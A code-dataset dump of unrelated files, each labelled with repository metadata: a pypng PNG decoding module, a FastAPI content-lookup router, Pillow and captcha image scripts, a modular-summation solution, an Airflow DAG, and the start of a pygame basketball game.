for attr in 'gamma transparent background'.split():
a = getattr(self, attr, None)
if a is not None:
meta[attr] = a
if self.plte:
meta['palette'] = self.palette()
return self.width, self.height, pixels, meta
def read_flat(self):
"""
Read a PNG file and decode it into flat row flat pixel format.
Returns (*width*, *height*, *pixels*, *metadata*).
May use excessive memory.
`pixels` are returned in flat row flat pixel format.
See also the :meth:`read` method which returns pixels in the
more stream-friendly boxed row flat pixel format.
"""
x, y, pixel, meta = self.read()
arraycode = 'BH'[meta['bitdepth']>8]
pixel = array(arraycode, itertools.chain(*pixel))
return x, y, pixel, meta
def palette(self, alpha='natural'):
"""Returns a palette that is a sequence of 3-tuples or 4-tuples,
synthesizing it from the ``PLTE`` and ``tRNS`` chunks. These
chunks should have already been processed (for example, by
calling the :meth:`preamble` method). All the tuples are the
same size: 3-tuples if there is no ``tRNS`` chunk, 4-tuples when
there is a ``tRNS`` chunk. Assumes that the image is colour type
3 and therefore a ``PLTE`` chunk is required.
If the `alpha` argument is ``'force'`` then an alpha channel is
always added, forcing the result to be a sequence of 4-tuples.
"""
if not self.plte:
raise FormatError(
"Required PLTE chunk is missing in colour type 3 image.")
plte = group(array('B', self.plte), 3)
if self.trns or alpha == 'force':
trns = array('B', self.trns or '')
trns.extend([255]*(len(plte)-len(trns)))
plte = list(map(operator.add, plte, group(trns, 1)))
return plte
def asDirect(self):
"""Returns the image data as a direct representation of an
``x * y * planes`` array. This method is intended to remove the
need for callers to deal with palettes and transparency
themselves. Images with a palette (colour type 3)
are converted to RGB or RGBA; images with transparency (a
``tRNS`` chunk) are converted to LA or RGBA as appropriate.
When returned in this format the pixel values represent the
colour value directly without needing to refer to palettes or
transparency information.
Like the :meth:`read` method this method returns a 4-tuple:
(*width*, *height*, *pixels*, *meta*)
This method normally returns pixel values with the bit depth
they have in the source image, but when the source PNG has an
``sBIT`` chunk it is inspected and can reduce the bit depth of
the result pixels; pixel values will be reduced according to
the bit depth specified in the ``sBIT`` chunk (PNG nerds should
note a single result bit depth is used for all channels; the
maximum of the ones specified in the ``sBIT`` chunk. An RGB565
image will be rescaled to 6-bit RGB666).
The *meta* dictionary that is returned reflects the `direct`
format and not the original source image. For example, an RGB
source image with a ``tRNS`` chunk to represent a transparent
colour, will have ``planes=3`` and ``alpha=False`` for the
source image, but the *meta* dictionary returned by this method
will have ``planes=4`` and ``alpha=True`` because an alpha
channel is synthesized and added.
*pixels* is the pixel data in boxed row flat pixel format (just
like the :meth:`read` method).
All the other aspects of the image data are not changed.
"""
self.preamble()
# Simple case, no conversion necessary.
if not self.colormap and not self.trns and not self.sbit:
return self.read()
x,y,pixels,meta = self.read()
if self.colormap:
meta['colormap'] = False
meta['alpha'] = bool(self.trns)
meta['bitdepth'] = 8
meta['planes'] = 3 + bool(self.trns)
plte = self.palette()
def iterpal(pixels):
for row in pixels:
row = [plte[x] for x in row]
yield array('B', itertools.chain(*row))
pixels = iterpal(pixels)
elif self.trns:
# It would be nice if there was some reasonable way
# of doing this without generating a whole load of
# intermediate tuples. But tuples does seem like the
# easiest way, with no other way clearly much simpler or
# much faster. (Actually, the L to LA conversion could
# perhaps go faster (all those 1-tuples!), but I still
# wonder whether the code proliferation is worth it)
it = self.transparent
maxval = 2**meta['bitdepth']-1
planes = meta['planes']
meta['alpha'] = True
meta['planes'] += 1
typecode = 'BH'[meta['bitdepth']>8]
def itertrns(pixels):
for row in pixels:
# For each row we group it into pixels, then form a
# characterisation vector that says whether each
# pixel is opaque or not. Then we convert
# True/False to 0/maxval (by multiplication),
# and add it as the extra channel.
row = group(row, planes)
opa = map(it.__ne__, row)
opa = map(maxval.__mul__, opa)
opa = list(zip(opa)) # convert to 1-tuples
yield array(typecode,
itertools.chain(*map(operator.add, row, opa)))
pixels = itertrns(pixels)
targetbitdepth = None
if self.sbit:
sbit = struct.unpack('%dB' % len(self.sbit), self.sbit)
targetbitdepth = max(sbit)
if targetbitdepth > meta['bitdepth']:
raise Error('sBIT chunk %r exceeds bitdepth %d' %
(sbit,self.bitdepth))
if min(sbit) <= 0:
raise Error('sBIT chunk %r has a 0-entry' % sbit)
if targetbitdepth == meta['bitdepth']:
targetbitdepth = None
if targetbitdepth:
shift = meta['bitdepth'] - targetbitdepth
meta['bitdepth'] = targetbitdepth
def itershift(pixels):
for row in pixels:
yield [p >> shift for p in row]
pixels = itershift(pixels)
return x,y,pixels,meta
def asFloat(self, maxval=1.0):
"""Return image pixels as per :meth:`asDirect` method, but scale
all pixel values to be floating point values between 0.0 and
*maxval*.
"""
x,y,pixels,info = self.asDirect()
sourcemaxval = 2**info['bitdepth']-1
del info['bitdepth']
info['maxval'] = float(maxval)
factor = float(maxval)/float(sourcemaxval)
def iterfloat():
for row in pixels:
yield [factor * p for p in row]
return x,y,iterfloat(),info
def _as_rescale(self, get, targetbitdepth):
"""Helper used by :meth:`asRGB8` and :meth:`asRGBA8`."""
width,height,pixels,meta = get()
maxval = 2**meta['bitdepth'] - 1
targetmaxval = 2**targetbitdepth - 1
factor = float(targetmaxval) / float(maxval)
meta['bitdepth'] = targetbitdepth
def iterscale():
for row in pixels:
yield [int(round(x*factor)) for x in row]
if maxval == targetmaxval:
return width, height, pixels, meta
else:
return width, height, iterscale(), meta
def asRGB8(self):
"""Return the image data as an RGB pixels with 8-bits per
sample. This is like the :meth:`asRGB` method except that
this method additionally rescales the values so that they
are all between 0 and 255 (8-bit). In the case where the
source image has a bit depth < 8 the transformation preserves
all the information; where the source image has bit depth
> 8, then rescaling to 8-bit values loses precision. No
dithering is performed. Like :meth:`asRGB`, an alpha channel
in the source image will raise an exception.
This function returns a 4-tuple:
(*width*, *height*, *pixels*, *metadata*).
*width*, *height*, *metadata* are as per the
:meth:`read` method.
*pixels* is the pixel data in boxed row flat pixel format.
"""
return self._as_rescale(self.asRGB, 8)
def asRGBA8(self):
"""Return the image data as RGBA pixels with 8-bits per
sample. This method is similar to :meth:`asRGB8` and
:meth:`asRGBA`: The result pixels have an alpha channel, *and*
values are rescaled to the range 0 to 255. The alpha channel is
synthesized if necessary (with a small speed penalty).
"""
return self._as_rescale(self.asRGBA, 8)
def asRGB(self):
"""Return image as RGB pixels. RGB colour images are passed
through unchanged; greyscales are expanded into RGB
triplets (there is a small speed overhead for doing this).
An alpha channel in the source image will raise an
exception.
The return values are as for the :meth:`read` method
except that the *metadata* reflect the returned pixels, not the
source image. In particular, for this method
``metadata['greyscale']`` will be ``False``.
"""
width,height,pixels,meta = self.asDirect()
if meta['alpha']:
raise Error("will not convert image with alpha channel to RGB")
if not meta['greyscale']:
return width,height,pixels,meta
meta['greyscale'] = False
typecode = 'BH'[meta['bitdepth'] > 8]
def iterrgb():
for row in pixels:
a = array(typecode, [0]) * 3 * width
for i in range(3):
a[i::3] = row
yield a
return width,height,iterrgb(),meta
def asRGBA(self):
"""Return image as RGBA pixels. Greyscales are expanded into
RGB triplets; an alpha channel is synthesized if necessary.
The return values are as for the :meth:`read` method
except that the *metadata* reflect the returned pixels, not the
source image. In particular, for this method
``metadata['greyscale']`` will be ``False``, and
``metadata['alpha']`` will be ``True``.
"""
width,height,pixels,meta = self.asDirect()
if meta['alpha'] and not meta['greyscale']:
return width,height,pixels,meta
typecode = 'BH'[meta['bitdepth'] > 8]
maxval = 2**meta['bitdepth'] - 1
maxbuffer = struct.pack('=' + typecode, maxval) * 4 * width
def newarray():
return array(typecode, maxbuffer)
if meta['alpha'] and meta['greyscale']:
# LA to RGBA
def convert():
for row in pixels:
# Create a fresh target row, then copy L channel
# into first three target channels, and A channel
# into fourth channel.
a = newarray()
pngfilters.convert_la_to_rgba(row, a)
yield a
elif meta['greyscale']:
# L to RGBA
def convert():
for row in pixels:
a = newarray()
pngfilters.convert_l_to_rgba(row, a)
yield a
else:
assert not meta['alpha'] and not meta['greyscale']
# RGB to RGBA
def convert():
for row in pixels:
a = newarray()
pngfilters.convert_rgb_to_rgba(row, a)
yield a
meta['alpha'] = True
meta['greyscale'] = False
return width,height,convert(),meta
def check_bitdepth_colortype(bitdepth, colortype):
"""Check that `bitdepth` and `colortype` are both valid,
and specified in a valid combination. Returns if valid,
raise an Exception if not valid.
"""
if bitdepth not in (1,2,4,8,16):
raise FormatError("invalid bit depth %d" % bitdepth)
if colortype not in (0,2,3,4,6):
raise FormatError("invalid colour type %d" % colortype)
# Check indexed (palettized) images have 8 or fewer bits
# per pixel; check only indexed or greyscale images have
# fewer than 8 bits per pixel.
if colortype & 1 and bitdepth > 8:
raise FormatError(
"Indexed images (colour type %d) cannot"
" have bitdepth > 8 (bit depth %d)."
" See http://www.w3.org/TR/2003/REC-PNG-20031110/#table111 ."
% (bitdepth, colortype))
if bitdepth < 8 and colortype not in (0,3):
raise FormatError("Illegal combination of bit depth (%d)"
" and colour type (%d)."
" See http://www.w3.org/TR/2003/REC-PNG-20031110/#table111 ."
% (bitdepth, colortype))
def isinteger(x):
try:
return int(x) == x
except (TypeError, ValueError):
return False
# === Support for users without Cython ===
try:
pngfilters
except NameError:
class pngfilters(object):
def undo_filter_sub(filter_unit, scanline, previous, result):
"""Undo sub filter."""
ai = 0
# Loops starts at index fu. Observe that the initial part
# of the result is already filled in correctly with
# scanline.
for i in range(filter_unit, len(result)):
x = scanline[i]
a = result[ai]
result[i] = (x + a) & 0xff
ai += 1
undo_filter_sub = staticmethod(undo_filter_sub)
def undo_filter_up(filter_unit, scanline, previous, result):
"""Undo up filter."""
for i in range(len(result)):
x = scanline[i]
b = previous[i]
result[i] = (x + b) & 0xff
undo_filter_up = staticmethod(undo_filter_up)
def undo_filter_average(filter_unit, scanline, previous, result):
"""Undo up filter."""
ai = -filter_unit
for i in range(len(result)):
x = scanline[i]
if ai < 0:
a = 0
else:
a = result[ai]
b = previous[i]
result[i] = (x + ((a + b) >> 1)) & 0xff
ai += 1
undo_filter_average = staticmethod(undo_filter_average)
def undo_filter_paeth(filter_unit, scanline, previous, result):
"""Undo Paeth filter."""
# Also used for ci.
ai = -filter_unit
for i in range(len(result)):
x = scanline[i]
if ai < 0:
a = c = 0
else:
a = result[ai]
c = previous[ai]
b = previous[i]
p = a + b - c
pa = abs(p - a)
pb = abs(p - b)
pc = abs(p - c)
if pa <= pb and pa <= pc:
pr = a
elif pb <= pc:
pr = b
else:
pr = c
result[i] = (x + pr) & 0xff
ai += 1
undo_filter_paeth = staticmethod(undo_filter_paeth)
def convert_la_to_rgba(row, result):
for i in range(3):
result[i::4] = row[0::2]
result[3::4] = row[1::2]
convert_la_to_rgba = staticmethod(convert_la_to_rgba)
def convert_l_to_rgba(row, result):
"""Convert a grayscale image to RGBA. This method assumes
the alpha channel in result is already correctly
initialized.
"""
for i in range(3):
result[i::4] = row
convert_l_to_rgba = staticmethod(convert_l_to_rgba)
def convert_rgb_to_rgba(row, result):
"""Convert an RGB image to RGBA. This method assumes the
alpha channel in result is already correctly initialized.
"""
for i in range(3):
result[i::4] = row[i::3]
convert_rgb_to_rgba = staticmethod(convert_rgb_to_rgba)
# === Command Line Support ===
def read_pam_header(infile):
"""
Read (the rest of a) PAM header. `infile` should be positioned
immediately after the initial 'P7' line (at the beginning of the
second line). Returns are as for `read_pnm_header`.
"""
# Unlike PBM, PGM, and PPM, we can read the header a line at a time.
header = dict()
while True:
l = infile.readline().strip()
if l == b'ENDHDR':
break
if not l:
raise EOFError('PAM ended prematurely')
if l[0] == b'#':
continue
l = l.split(None, 1)
if l[0] not in header:
header[l[0]] = l[1]
else:
header[l[0]] += b' ' + l[1]
required = [b'WIDTH', b'HEIGHT', b'DEPTH', b'MAXVAL']
WIDTH,HEIGHT,DEPTH,MAXVAL = required
present = [x for x in required if x in header]
if len(present) != len(required):
raise Error('PAM file must specify WIDTH, HEIGHT, DEPTH, and MAXVAL')
width = int(header[WIDTH])
height = int(header[HEIGHT])
depth = int(header[DEPTH])
maxval = int(header[MAXVAL])
if (width <= 0 or
height <= 0 or
depth <= 0 or
maxval <= 0):
raise Error(
'WIDTH, HEIGHT, DEPTH, MAXVAL must all be positive integers')
return 'P7', width, height, depth, maxval
def read_pnm_header(infile, supported=(b'P5', b'P6')):
"""
Read a PNM header, returning (format,width,height,depth,maxval).
`width` and `height` are in pixels. `depth` is the number of
channels in the image; for PBM and PGM it is synthesized as 1, for
PPM as 3; for PAM images it is read from the header. `maxval` is
synthesized (as 1) for PBM images.
"""
# Generally, see http://netpbm.sourceforge.net/doc/ppm.html
# and http://netpbm.sourceforge.net/doc/pam.html
# Technically 'P7' must be followed by a newline, so by using
# rstrip() we are being liberal in what we accept. I think this
# is acceptable.
type = infile.read(3).rstrip()
if type not in supported:
raise NotImplementedError('file format %s not supported' % type)
if type == b'P7':
# PAM header parsing is completely different.
return read_pam_header(infile)
# Expected number of tokens in header (3 for P4, 4 for P6)
expected = 4
pbm = (b'P1', b'P4')
if type in pbm:
expected = 3
header = [type]
# We have to read the rest of the header byte by byte because the
# final whitespace character (immediately following the MAXVAL in
# the case of P6) may not be a newline. Of course all PNM files in
# the wild use a newline at this point, so it's tempting to use
# readline; but it would be wrong.
def getc():
c = infile.read(1)
if not c:
raise Error('premature EOF reading PNM header')
return c
c = getc()
while True:
# Skip whitespace that precedes a token.
while c.isspace():
c = getc()
# Skip comments.
while c == '#':
while c not in b'\n\r':
c = getc()
if not c.isdigit():
raise Error('unexpected character %s found in header' % c)
# According to the specification it is legal to have comments
# that appear in the middle of a token.
# This is bonkers; I've never seen it; and it's a bit awkward to
# code good lexers in Python (no goto). So we break on such
# cases.
token = b''
while c.isdigit():
token += c
c = getc()
# Slight hack. All "tokens" are decimal integers, so convert
# them here.
header.append(int(token))
if len(header) == expected:
break
# Skip comments (again)
while c == '#':
while c not in '\n\r':
c = getc()
if not c.isspace():
raise Error('expected header to end with whitespace, not %s' % c)
if type in pbm:
# synthesize a MAXVAL
header.append(1)
depth = (1,3)[type == b'P6']
return header[0], header[1], header[2], depth, header[3]
def write_pnm(file, width, height, pixels, meta):
"""Write a Netpbm PNM/PAM file.
"""
bitdepth = meta['bitdepth']
maxval = 2**bitdepth - 1
# Rudely, the number of image planes can be used to determine
# whether we are L (PGM), LA (PAM), RGB (PPM), or RGBA (PAM).
planes = meta['planes']
# Can be an assert as long as we assume that pixels and meta came
# from a PNG file.
assert planes in (1,2,3,4)
if planes in (1,3):
if 1 == planes:
# PGM
# Could generate PBM if maxval is 1, but we don't (for one
# thing, we'd have to convert the data, not just blat it
# out).
fmt = 'P5'
else:
# PPM
fmt = 'P6'
header = '%s %d %d %d\n' % (fmt, width, height, maxval)
if planes in (2,4):
# PAM
# See http://netpbm.sourceforge.net/doc/pam.html
if 2 == planes:
tupltype = 'GRAYSCALE_ALPHA'
else:
tupltype = 'RGB_ALPHA'
header = ('P7\nWIDTH %d\nHEIGHT %d\nDEPTH %d\nMAXVAL %d\n'
'TUPLTYPE %s\nENDHDR\n' %
(width, height, planes, maxval, tupltype))
file.write(header.encode('ascii'))
# Values per row
vpr = planes * width
# struct format
fmt = '>%d' % vpr
if maxval > 0xff:
fmt = fmt + 'H'
else:
fmt = fmt + 'B'
for row in pixels:
file.write(struct.pack(fmt, *row))
file.flush()
def color_triple(color):
"""
Convert a command line colour value to a RGB triple of integers.
FIXME: Somewhere we need support for greyscale backgrounds etc.
"""
if color.startswith('#') and len(color) == 4:
return (int(color[1], 16),
int(color[2], 16),
int(color[3], 16))
if color.startswith('#') and len(color) == 7:
return (int(color[1:3], 16),
int(color[3:5], 16),
int(color[5:7], 16))
elif color.startswith('#') and len(color) == 13:
return (int(color[1:5], 16),
int(color[5:9], 16),
int(color[9:13], 16))
def _add_common_options(parser):
"""Call *parser.add_option* for each of the options that are
common between this PNG--PNM conversion tool and the gen
tool.
"""
parser.add_option("-i", "--interlace",
default=False, action="store_true",
help="create an interlaced PNG file (Adam7)")
parser.add_option("-t", "--transparent",
action="store", type="string", metavar="#RRGGBB",
help="mark the specified colour as transparent")
parser.add_option("-b", "--background",
action="store", type="string", metavar="#RRGGBB",
help="save the specified background colour")
parser.add_option("-g", "--gamma",
action="store", type="float", metavar="value",
help="save the specified gamma value")
parser.add_option("-c", "--compression",
action="store", type="int", metavar="level",
help="zlib compression level (0-9)")
return parser
def _main(argv):
"""
Run the PNG encoder with options from the command line.
"""
# Parse command line arguments
from optparse import OptionParser
version = '%prog ' + __version__
parser = OptionParser(version=version)
parser.set_usage("%prog [options] [imagefile]")
parser.add_option('-r', '--read-png', default=False,
action='store_true',
help='Read PNG, write PNM')
parser.add_option("-a", "--alpha",
action="store", type="string", metavar="pgmfile",
help="alpha channel transparency (RGBA)")
_add_common_options(parser)
(options, args) = parser.parse_args(args=argv[1:])
# Convert options
if options.transparent is not None:
options.transparent = color_triple(options.transparent)
if options.background is not None:
options.background = color_triple(options.background)
# Prepare input and output files
if len(args) == 0:
infilename = '-'
infile = sys.stdin
elif len(args) == 1:
infilename = args[0]
infile = open(infilename, 'rb')
else:
parser.error("more than one input file")
outfile = sys.stdout
if sys.platform == "win32":
import msvcrt, os
msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
if options.read_png:
# Encode PNG to PPM
png = Reader(file=infile)
width,height,pixels,meta = png.asDirect()
write_pnm(outfile, width, height, pixels, meta)
else:
# Encode PNM to PNG
format, width, height, depth, maxval = \
read_pnm_header(infile, (b'P5',b'P6',b'P7'))
# When it comes to the variety of input formats, we do something
# rather rude. Observe that L, LA, RGB, RGBA are the 4 colour
# types supported by PNG and that they correspond to 1, 2, 3, 4
# channels respectively. So we use the number of channels in
# the source image to determine which one we have. We do not
# care about TUPLTYPE.
greyscale = depth <= 2
pamalpha = depth in (2,4)
supported = [2**x-1 for x in range(1,17)]
try:
mi = supported.index(maxval)
except ValueError:
raise NotImplementedError(
'your maxval (%s) not in supported list %s' %
(maxval, str(supported)))
bitdepth = mi+1
writer = Writer(width, height,
greyscale=greyscale,
bitdepth=bitdepth,
interlace=options.interlace,
transparent=options.transparent,
background=options.background,
alpha=bool(pamalpha or options.alpha),
gamma=options.gamma,
compression=options.compression)
if options.alpha:
pgmfile = open(options.alpha, 'rb')
format, awidth, aheight, adepth, amaxval = \
read_pnm_header(pgmfile, 'P5')
if amaxval != '255':
raise NotImplementedError(
'maxval %s not supported for alpha channel' % amaxval)
if (awidth, aheight) != (width, height):
raise ValueError("alpha channel image size mismatch"
" (%s has %sx%s but %s has %sx%s)"
% (infilename, width, height,
options.alpha, awidth, aheight))
writer.convert_ppm_and_pgm(infile, pgmfile, outfile)
else:
writer.convert_pnm(infile, outfile)
if __name__ == '__main__':
try:
_main(sys.argv)
except Error as e:
print(e, file=sys.stderr)
| pret/pokered | tools/pokemontools/png.py | png.py | py | 100,616 | python | en | code | 3,597 | github-code | 13 |
18664987365 |
from fastapi import Depends, HTTPException, status, APIRouter, Request, Response
from database import engineconn
from db_class import MOVIE, TV, BOOK, WEBTOON
from sqlalchemy.orm import Session
import json
router = APIRouter()
with open('contents_idx.json', 'r', encoding='UTF-8') as f:
contents_idx = json.load(f)
def get_db():
try:
engine = engineconn()
db = engine.sessionmaker()
yield db
finally:
db.close()
async def show_content(index: int, db:Session = Depends(get_db)):
"""
return: category(m,t,b,w), content info (depends on db schema)
"""
name = contents_idx[str(index)][:-1]
cat = contents_idx[str(index)][-1]
print(cat== 'w')
try:
if cat == 'm':
content = db.query(MOVIE).filter(MOVIE.name == name).first()
elif cat == 't':
content = db.query(TV).filter(TV.name == name).first()
elif cat == 'b':
content = db.query(BOOK).filter(BOOK.name == name).first()
elif cat == 'w':
content = db.query(WEBTOON).filter(WEBTOON.name == name).first()
except Exception as e :
#print(e)
content=None
return cat, content
async def similar_content(index: int, db:Session = Depends(get_db)):
"""
Args:
index: integer index of a content
Return:
list of contents (index, category, content name)
"""
with open('./routers/indices.txt','rb') as f:
indices = f.readlines()
output = indices[index-1].decode('UTF-8').split()[1:]
output = [int(elem)+1 for elem in output]
# print(output)
result = []
for idx in output[:5]:
cat, item = await show_content(idx, db)
if(item is not None):
result.append([idx, cat, item.name])
return result
async def get_multiple_contents(idx_list, db:Session = Depends(get_db)):
"""
Get information of multiple contents at once
return:
list of contents (index, category, content name)
"""
result = []
for idx in idx_list:
cat, item = await show_content(idx, db)
if(item is not None):
result.append([idx, cat, item.name])
return result
| jjklle/SWE3028 | routers/content.py | content.py | py | 2,220 | python | en | code | 0 | github-code | 13 |
31986281811 | from PIL import Image
'''
改变图片尺寸方法1,这个方法会直接将图片的尺寸输出为400*400,改变图片的纵横比
'''
image = Image.open('001.jpg')
print(image.size) #输出图片大小
new_image = image.resize((400, 400))
new_image.save('001_400.jpg') # 改变图片尺寸为400*400
'''
改变图片尺寸方法2,这个方法会保持图片的纵横比,比较好看
'''
image = Image.open('001.jpg')
print(image.size) #输出图片大小
new_image2 = image.thunbnail((400, 400))
image.save('new_image2.jpg')
'''
将logo张贴到图片上
'''
image = Image.open('002.jpg')
logo = Image.open('logo.jpg')
image_copy = image.copy()
position = ((image_copy.width - logo.width), (image_copy.height - logo.height))
image_copy.paste(logo, position, logo)
image_copy.save('002_logo.jpg')
| 00xyz00/study_pillow | test1.py | test1.py | py | 816 | python | en | code | 0 | github-code | 13 |
37798051021 | # import math
# import numpy as np
# (x^y)%p in O(log y)
def power(x, y, p) :
res = 1 # Initialize result
# Update x if it is more
# than or equal to p
x = x % p
if (x == 0) :
return 0
while (y > 0) :
# If y is odd, multiply
# x with result
if ((y & 1) == 1) :
res = (res * x) % p
# y must be even now
y = y >> 1 # y = y/2
x = (x * x) % p
return res
def parser():
while 1:
data = list(input().split(' '))
for number in data:
if len(number) > 0:
yield(number)
input_parser = parser()
def get_word():
global input_parser
return next(input_parser)
def get_number():
data = get_word()
try:
return int(data)
except ValueError:
return float(data)
p,q,n,m = [int(i) for i in input().split()]
res = sum((pow(p,k,m)%m*(pow(k,q,m)%m))%m for k in (range(1,n+1)))
res = res%m
print(res)
| jpitoskas/IEEEXtreme15.0 | summation.py | summation.py | py | 977 | python | en | code | 0 | github-code | 13 |
6999415003 | import logging
import airflow
from airflow import DAG
from airflow.operators.python import PythonOperator
from airflow.sensors.external_task import ExternalTaskSensor
from datetime import datetime, timedelta
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
args = {
"owner": "airflow",
"start_date": airflow.utils.dates.days_ago(1)
}
dag = DAG(
dag_id="Second", default_args=args, schedule_interval='55 06 * * *'
)
def pp():
print("second task depends on first task")
with dag:
second_task = PythonOperator(task_id="second_task", python_callable=pp, dag=dag)
ExternalTaskSensor(
task_id='external_sensor_task',
external_dag_id='First',
external_task_id='first_task',
execution_delta=timedelta(minutes=10),
timeout=300,
dag=dag
) >> second_task
| itnoobzzy/EasyAirflow | dags/second.py | second.py | py | 854 | python | en | code | 0 | github-code | 13 |
43928603974 | from PIL import Image, ImageFilter, ImageFont, ImageDraw
import random
import string
# 随机数字
def rndchar():
# print(chr(65))
return chr(random.randint(65, 90))
# 随机数字+字母
def getrandl(num, many): # num 位数 many个数
for x in range(many):
s = ''
for i in range(num):
n = random.randint(1, 2) # 1 生成数字 2 生成字母
if n == 1:
numb = random.randint(0, 9)
s += str(numb)
else:
s += str(random.choice(string.ascii_letters))
return s
def rndColor():
return (random.randint(64, 255), random.randint(64, 255), random.randint(64, 255))
def rndColor2():
return (random.randint(32, 127), random.randint(32, 127), random.randint(32, 127))
# a = rndchar()
# b = rndchar()
# c = rndchar()
# d = rndchar()
# print(a,b,c,d)
width = 60 * 4
height = 60
# 设置画布大小、颜色
img = Image.new('RGB', (width, height), (0, 0, 0)) # 0, 0,0 黑色
# img.show()
# 设置字体
font = ImageFont.truetype('msyh.ttc', 36)
draw = ImageDraw.Draw(img)
# 填充像素点
for x in range(width):
for y in range(height):
draw.point((x, y), fill=rndColor())
for t in range(4):
# draw.text((60*x,10),rndchar(),font =font,file =(255,255,255))# 60 横坐标、60+10=70位置继续、10 纵坐标
draw.text((60 * t, 10), getrandl(1, 4), font=font, fill=rndColor()) # 60 横坐标、60+10=70位置继续、10 纵坐标
img = img.filter(ImageFilter.BLUR)
img.save(r'D:\DOWNLOAD\TEST1.PNG')
img.show()
| shenshuke/VerificationCode | tyjx/126.py | 126.py | py | 1,562 | python | en | code | 0 | github-code | 13 |
47044578924 | import random
student_name = "Jingjing Bai"
# 1. Q-Learning
class QLearningAgent:
"""Implement Q Reinforcement Learning Agent using Q-table."""
def __init__(self, game, discount, learning_rate, explore_prob):
"""Store any needed parameters into the agent object.
Initialize Q-table.
"""
self.game = game
self.discount = discount
self.alpha = learning_rate
self.epsilon = explore_prob
self.qvalues = {}
def get_q_value(self, state, action):
"""Retrieve Q-value from Q-table.
For an never seen (s,a) pair, the Q-value is by default 0.
"""
if (state, action) in self.qvalues:
return self.qvalues[(state, action)]
else:
return 0.0
def set_q_value(self, state, action, value):
self.qvalues[(state, action)] = value
def get_value(self, state):
"""Compute state value from Q-values using Bellman Equation.
V(s) = max_a Q(s,a)
"""
qvalues = [self.get_q_value(state, action)
for action in self.game.get_actions(state)]
if not len(qvalues):
return 0.0
return max(qvalues)
def get_best_policy(self, state):
"""Compute the best action to take
in the state using Policy Extraction.
π(s) = argmax_a Q(s,a)
If there are ties, return a random one for better performance.
Hint: use random.choice().
"""
import random
best_value = self.get_value(state)
best_actions = [action for action in self.game.get_actions(state)
if self.get_q_value(state, action) == best_value]
if not len(best_actions):
return None
else:
r = random.choice(best_actions)
return r
def update(self, state, action, next_state, reward):
"""Update Q-values using running average.
Q(s,a) = (1 - α) Q(s,a) + α (R + γ V(s'))
Where α is the learning rate, and γ is the discount.
Note: You should not call this function in your code.
"""
qvalue = self.get_q_value(state, action)
next_value = self.get_value(next_state)
new_value = (1-self.alpha) * qvalue + \
self.alpha * (reward + self.discount * next_value)
self.set_q_value(state, action, new_value)
# 2. Epsilon Greedy
def get_action(self, state):
"""Compute the action to take for the agent, incorporating exploration.
That is, with probability ε, act randomly.
Otherwise, act according to the best policy.
Hint: use random.random() < ε to check if exploration is needed.
"""
legal_actions = self.game.get_actions(state)
action = None
if random.random() < self.epsilon:
action = random.choice(list(legal_actions))
else:
action = self.get_best_policy(state)
return action
# 3. Bridge Crossing Revisited
def question3():
epsilon = ...
learning_rate = ...
return 'NOT POSSIBLE'
# If not possible, return 'NOT POSSIBLE'
# 5. Approximate Q-Learning
class ApproximateQAgent(QLearningAgent):
"""Implement Approximate Q Learning Agent using weights."""
def __init__(self, *args, extractor):
"""Initialize parameters and store the feature extractor.
Initialize weights table."""
super().__init__(*args)
self.featExtractor = extractor
self.weights = {}
def get_weight(self, feature):
"""Get weight of a feature.
Never seen feature should have a weight of 0.
"""
if feature in self.weights:
return self.weights[feature]
return 0
def get_q_value(self, state, action):
"""Compute Q value based on the dot product
of feature components and weights.
Q(s,a) = w_1 * f_1(s,a) + w_2 * f_2(s,a) + ... + w_n * f_n(s,a)
"""
features = self.featExtractor(state, action)
result = 0
for feature in features:
result += self.get_weight(feature) * features[feature]
return result
def update(self, state, action, next_state, reward):
"""Update weights using least-squares approximation.
Δ = R + γ V(s') - Q(s,a)
Then update weights: w_i = w_i + α * Δ * f_i(s, a)
"""
features = self.featExtractor(state, action)
correction = reward + self.discount*self.get_value(next_state) \
- self.get_q_value(state, action)
for feature in features:
if feature in self.weights:
self.weights[feature] += \
self.alpha * correction * features[feature]
else:
self.weights[feature] = \
self.alpha * correction * features[feature]
# 6. Feedback
# Just an approximation is fine.
feedback_question_1 = 4
feedback_question_2 = """
to jump out of MDP and think in RL way
"""
feedback_question_3 = """
UI design, this is easy to understand
"""
| jingjingb/cis521-hw7 | agents.py | agents.py | py | 5,086 | python | en | code | 0 | github-code | 13 |
7236899154 | import pygame
from random import randint
pygame.init()
score = 0
screen_widhte = 1024
screen_lengte = 768
display_output = (screen_widhte, screen_lengte)
screen = pygame.display.set_mode(display_output)
pygame.display.set_caption('Basketball!')
Background = pygame.image.load("Basketball court.jpg.")
tick = pygame.mixer.Sound("gunshot.wav")
tick_2 = pygame.mixer.Sound("Sound scored.wav")
tick_3 = pygame.mixer.Sound("dynamite.wav")
tick_nope = pygame.mixer.Sound("Nope.ogg")
basketball = pygame.image.load("Basketball.png")
x = randint(0, screen_widhte)
y = 0
radius = 100
speed = 5
ball_rep_x = x + 50
ball_rep_y = y + 50
basket = pygame.image.load("Basketball hoop.png")
basket_width = 125
basket_pos_x = 450
basket_pos_y = 600
basket_rep_x = [basket_pos_x + 31, basket_pos_x + 94]
basket_rep_y = [basket_pos_y + 14, basket_pos_y + 20]
basket_speed = 8
black = (0, 0, 0)
red = (255, 0, 0)
green = (0, 255, 0)
blue = (0, 0, 255)
white = (255, 255, 255)
text_x = 15
text_y = 15
font = pygame.font.Font("freesansbold.ttf", 40)
play = True
clock = pygame.time.Clock()
def check_for_event():
global x, y, play, basket_pos_y, basket_pos_x
for event in pygame.event.get():
if __name__ == '__main__':
if event.type == pygame.QUIT:
play = False
keys = pygame.key.get_pressed()
if keys[pygame.K_LEFT]:
basket_pos_x -= basket_speed
if keys[pygame.K_RIGHT]:
basket_pos_x += basket_speed
#if keys[pygame.K_UP]:
# y -= speed
#if keys[pygame.K_DOWN]:
# y += speed
def update_ball_pos():
global y, ball_rep_x, ball_rep_y
y += speed
ball_rep_x = x + 50
ball_rep_y = y + 50
initialise_ball()
def initialise_ball():
global x, y
if y > screen_lengte - radius:
y = 0
x = randint(0, screen_widhte)
def enforce_border():
global x, y, basket_pos_x, basket_pos_y
if x < 0:
x = 0
if x > screen_widhte - radius:
x = screen_widhte - radius
if y < 0:
y = 0
if y > screen_lengte - radius:
y = screen_lengte - radius
if basket_pos_x < 0:
basket_pos_x = 0
if basket_pos_x > screen_widhte - basket_width:
basket_pos_x = screen_widhte - basket_width
def show_images():
global basket_rep_x, basket_rep_y
